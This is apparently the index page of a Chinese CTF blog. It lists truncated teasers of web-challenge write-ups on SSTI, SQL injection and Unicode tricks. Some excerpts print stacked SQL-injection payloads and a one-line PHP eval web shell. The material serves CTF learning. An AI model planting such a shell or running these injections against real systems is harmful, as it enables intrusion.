Here’s something encrypted, password is required to continue reading.
-
浅析flask中的SSti漏洞
总结一下吧
-
[CISCN 2019 初赛]Love Math
进来之后直接就给源码了 12345678910111213141516171819202122232425262728<?phperror_reporting(0);//听说你很喜欢数学,不知道你是否爱它胜过爱flagif(!isset($_GET['c'])){ show_source(__FILE__);}else{ /... -
[ASIS 2019]Unicorn shop
查看源代码发现有一个提示说要admin,还得到了这个 1<meta charset="utf-8"><!--Ah,really important,seriously. --> 发现ID框没东西,但是价格框貌似是只能输入一个字符,不然就会报错为 1Only one char(?) allowed! 并且慢慢测试发现只能买第四个物品,但是一个字符... -
强网杯2019
[强网杯 2019]随便注一个堆叠注入 123451';show database();#1';show tables;#1';show columns from `1919810931114514`; 这里有三个新姿势,就是 handler123456# 打开一个表并取别名handler `1919810931114514` open as `a`; # 查... -
BSidesCF2019
[BSidesCF 2019]Futurella查看源代码 [BSidesCF 2019]Kookie发现登录不成功 123456789101112Request:GET /?action=login HTTP/1.1Host: 38026284-ee1c-468a-a556-b4b1091c3946.node5.buuoj.cn:81Cache-Control: max-age=0Upgr... -
WUSTCTF2020
[WUSTCTF2020]朴实无华先进行目录扫描 /robots.txt 1234User-agent: *Disallow: /fAke_f1agggg.php抓包发现/fl4g.php 123456789101112131415161718192021222324252627282930313233343536373839404142<?phpheader('Conte... -
NepCTF2024
又学了一些
-
羊城杯2024
0x01 前言这几天比赛是不断的,虽然我输出少,但是咱还是得参与啊 0x02 questionLyrics For You扫描出来有两个路由/board和login,同时观察url,可能存在目录穿越 直接读取flag,失败发现可以载入代码在board,尝试载入小马 1<script language='php'>@eval($_POST[1]);</sc... -
[NewStarCTF 公开赛赛道]SsTi
SSTI部分